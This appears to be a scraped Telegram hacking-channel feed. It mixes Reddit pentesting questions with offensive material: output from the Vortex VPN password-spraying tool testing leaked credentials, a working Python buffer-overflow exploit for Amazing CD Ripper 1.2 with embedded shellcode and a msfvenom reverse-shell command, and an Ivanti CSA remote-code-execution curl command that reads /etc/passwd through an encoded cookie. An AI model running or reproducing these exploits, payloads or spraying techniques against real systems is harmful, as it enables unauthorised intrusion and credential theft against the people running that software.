Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F

[ *] Choose an endpoint type to attack, or all to attack any supported endpoint
0 : cisco
1 : citrix
2 : citrixlegacy
3 : fortinet
4 : pulse
5 : sonicwall
6 : all
$> 6
[*] Attacking vpn.evilcorp.com:443
[-] elliot.alderson@evilcorp.com:MrRobot2021! is not valid.
[+] tyrell.wellick@evilcorp.com:Joanna2021! is valid!
[>] Found 1 valid logins
[*] Updating Db...
[+] Done
Perform a password spray or bruteforce using leaked credentials As Vortex keeps track of credentials (https://www.kitploit.com/search/label/Credentials) leaked on PwnDB, a user can select to test all leaked credentials instead of providing a password file. However, consider this behaviour is much different to a normal password spray. In a normal password spraying attack, indeed, a single password is tried against all users. In a leaked credentials attack, the leaked credentials is tested against the specific user it was leaked with. So, as an example, if Vortex found the leaks: User Leaks
---------------------------- ----------------------------
elliot.alderson@evilcorp.com ["ISecretlyLoveAngela2020!"]
tom.wellick@evilcorp.com ["Puppy19!", "MySweetJ111!"]
Vortex will operate the following attempts, and just the following: elliot.alderson@evilcorp.com:ISecretlyLoveAngela2020!
tom.wellick@evilcorp.com:Puppy19!
tom.wellick@evilcorp.com:MySweetJ111!
To perform this attack, no password file is needed, but it's required to set the (-L, or --leaks) parameter. 6 [*] Attacking vpn.evilcorp.com:443 [+] elliot.alderson@evilcorp.com:ISecretlyLoveAngela2020! is valid! [-] tyrell.wellick@evilcorp.com:Puppy19! is not valid. [-] tyrell.wellick@evilcorp.com:MySweetJ111! is not valid. [>] Found 1 valid logins [*] Updating Db... [+] Done">python manage.py -w workspace1 vpn -c attack -L

,d#####F^ ,yy############yy ^9#######,
,######" y###################by ^9######,
######^ y#####F"" ^"9######y "######]
d#####^ ,#####" by klezVirus ^9#####, ^######,
,#####] ,####F yy#######y, ^9####b ^######
[##### ####F ,###F""'"9####, 9####] 9#####
#####F [#### ,##F^ yy "###b 9####, ^#####]
#####] [###] ### dF""#b ^###] ^####] #####]
9####b [#### 9##, 9bd [#] [##b ##### [#####
[##### ####, 9##y, ,y##^ d##F ##### [####]
#####b ^####y ^"#####" d###^ ,####] d#####
[#####, ^####by ,d###^ d####^ #####F
9#####y "#####byyyyyyd####F^ d####F [#####9
9#####b, ""############"^ ,d####F ,######
^######b, ""'""'"^ ,d#####F d#####F

[*] Choose an e ndpoint type to attack, or all to attack any supported endpoint
0 : cisco
1 : citrix
2 : citrixlegacy
3 : fortinet
4 : pulse
5 : sonicwall
6 : all
$> 6
[*] Attacking vpn.evilcorp.com:443
[+] elliot.alderson@evilcorp.com:ISecretlyLoveAngela2020! is valid!
[-] tyrell.wellick@evilcorp.com:Puppy19! is not valid.
[-] tyrell.wellick@evilcorp.com:MySweetJ111! is not valid.
[>] Found 1 valid logins
[*] Updating Db...
[+] Done
That's mostly it. Sometimes the tool can ask for more information before performing an attack, such as selecting the VPN realm/group. Showing results At any time, you can see valid logins you found using the following command: python manage.py db -w workspace1 -c found-logins
[+] Valid Logins Collected:
ID Target E-Mail Password
---- -------------------- ---------------------------- ------------------------
1 vpn.evilcorp.com:443 tom.wellick@evilcorp.com Joanna2021!
2 vpn.evilcorp.com:443 elliot.alderson@evilcorp.com ISecretlyLoveAngela2020!
[+] Done

___________________________
@hacking_Attack
@Hacking_Video
which should i get?
https://www.reddit.com/r/Pentesting/comments/tjl48m/which_should_i_get/

So.. im getting a laptop, and im gonna use it for bruteforcing and some gaming. So this are the options: Asus Rog strix g15 with -ryzen 9 5900hx -rtx 3060 115w -300hz -16gb ram (ampliable to 32gb dual channel) -rj45 Asus zephyrus g14 with: -ryzen 7 5800hs -rtx 3060 85w -120hz -16gb of ram (ampliable to 24 with 1 slot) -No rj45 So for brute force does the gpu W a deal? Does 16gb ram enough? Or should i upgrade it? If so, does single channel good enough? Is rj45 needed? Thank you in advance View Poll (https://www.reddit.com/poll/tjl48m) submitted by /u/Clyde253 (https://www.reddit.com/user/Clyde253)
[link] (https://www.reddit.com/r/Pentesting/comments/tjl48m/which_should_i_get/) [comments] (https://www.reddit.com/r/Pentesting/comments/tjl48m/which_should_i_get/)

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
How would I setup a hacking challenge?

I invented this tool (https://github.com/ki4jgt/Inertia), and have been told numerous times that it's insecure/a bad idea. But no one's been able to tell me exactly why. I've asked questions about it on Stackoverflow, and had programmers tell me that's it's not a great idea, and doesn't really secure passwords.

To me, it seems no different than having a password manager, with a master password on your desktop. Can someone tell me what's so bad about this? Or is it just a general feeling everyone has?

How would I challenge people to break it? I haven't changed my GitHub password to Goddard yet, but that's the challenge I have currently.

submitted by /u/ki4jgt
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
DNS Caches not encrypted
https://www.reddit.com/r/Pentesting/comments/tjmwlp/dns_caches_not_encrypted/

I am working on a testing of a small home based router. I can see that there is dns cache feature enabled on that device where user requests are cached. I have had read about DNSSEC before and I believe cache that is being stored locally on these small routers do not have encryption enabled. My specific questions are: 1. Is this an issue? Theoretically may be since cache responses that are stored in device are not encrypted. 2. Is DNSSEC only way to encrypt those responses? Thank you much in advance. submitted by /u/Creepy-Trust-9581 (https://www.reddit.com/user/Creepy-Trust-9581)
[link] (https://www.reddit.com/r/Pentesting/comments/tjmwlp/dns_caches_not_encrypted/) [comments] (https://www.reddit.com/r/Pentesting/comments/tjmwlp/dns_caches_not_encrypted/)

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Amazing CD Ripper 1.2 Buffer Overflow

https://4.bp.blogspot.com/-gQsa2Au6OFw/WWlvKe9cGFI/AAAAAAAAIME/7MuhuX3Jqy0CeEu0oyVXmXST8BDpKvIGgCLcBGAs/s1600/h15.png Amazing CD Ripper version 1.2 suffers from a buffer overflow vulnerability.

MD5 | 109eebb49df171d38123922bad1203d3Download # Exploit Title: Amazing CD Ripper v1.2 - Buffer Overflow
# Exploit Author: Hejap Zairy
# Date: 03.08.2022
# Software Link: http://www.shelltoys.com/cd_ripper.exe
# Software Link: https://web.archive.org/web/20160313071152/http://www.shelltoys.com/cd_ripper.exe
# Tested Version: v1.2.1
# Tested on: Windows 10 64bit

# 1.- Run python code : 0day-Hejap_Zairy.py
# 2.- Open 0day_Hejap.txt and copy All content to Clipboard
# 3.- Open Amazing CD Ripper and press Enter Code
# 4.- Paste the Content of 0day_Hejap.txt into the 'Enter Code'
# 5.- Click 'OK'

# Author Code By Hejap Zairy
#CVE-2022-0x515
#!/usr/bin/env python

from pwn import *

buffer = "\x41" * 1016
# 0x100017a1 : push esp # ret | null {PAGE_EXECUTE_READ} [akrip32.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0rc2 (C:\Program Files (x86)\Shelltoys\Amazing CD Ripper\akrip32.dll)

push_esp = p32(0x100017a1) #push esp ret ret from akrip32.dll
nops = "\x90" * 15 #515 tshhh theardlooo love Malware
#msfvenom --arch x64 windows/x64/shell_reverse_tcp lhost=ip lport=443 -f python -e x64/shikata_ga_nai -b "\x00\x0a\x0d\x20\xff"
#msfvenom --arch x64 -p windows/x64/messagebox TEXT="0day Hejap Zairy" -f python -e x64/shikata_ga_nai EXITFUNC=thread -b "\x00\x0a\x0d\x20\xff"
buf = b""
buf += b"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00"
buf += b"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b"
buf += b"\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e"
buf += b"\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9"
buf += b"\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52"
buf += b"\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00"
buf += b"\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b"
buf += b"\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48"
buf += b"\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
buf += b"\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6"
buf += b"\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b"
buf += b"\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
buf += b"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41"
buf += b"\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0"
buf += b"\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff"
buf += b"\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a"
buf += b"\x01\x00\x00\x3e\x4c\x8d\x85\x2b\x01\x00\x00\x48\x31"
buf += b"\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\xbb\xe0\x1d\x2a"
buf += b"\x0a\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28"
buf += b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72"
buf += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x30\x64\x61\x79"
buf += b"\x20\x48\x65\x6a\x61\x70\x20\x5a\x61\x69\x72\x79\x00"
buf += b"\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00"
padding ="C" * (len(buffer) - len(push_esp) - len(nops))
payload = buffer + push_esp + nops + buf + padding
try:
with open("0day_Hejap.txt","wb") as f:
print("[+] Creating %s Shellcode 0day-Hejap payload.." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("[-]File cannot be created")
# Proof and Exploit:
https://i.imgur.com/3r5sKNo.png
Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Ivanti Endpoint Manager CSA 4.5 / 4.6 Remote Code Execution

https://2.bp.blogspot.com/-v3K-Hxbn0Es/WWlvhvX1clI/AAAAAAAAIQY/UsJ0X_N1RWgdGsUiiIhYa-pG6QWPEsSmwCLcBGAs/s1600/h91.png
Ivanti Endpoint Manager CSA versions 4.5 and 4.6 suffer from an unauthenticated remote code execution vulnerability.

MD5 | 59d3bc20720bd412425b82923627b636

Download
# Exploit Title: Ivanti Endpoint Manager - Cloud Service Appliance (Unauthenticated Remote Code Execution)
# Date: 20/03/2022
# Exploit Author: d7x
# Vendor Homepage: https://www.ivanti.com/
# Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6
# Version: CSA 4.6 4.5 - EOF Aug 2021
# Tested on: Linux x86_64 # CVE : CVE-2021-44529
# CVE : CVE-2021-44529

###
This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz):
https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US

Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies

@d7x_real
https://d7x.promiselabs.net
https://www.promiselabs.net
###

# cat /etc/passwd
curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '
Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video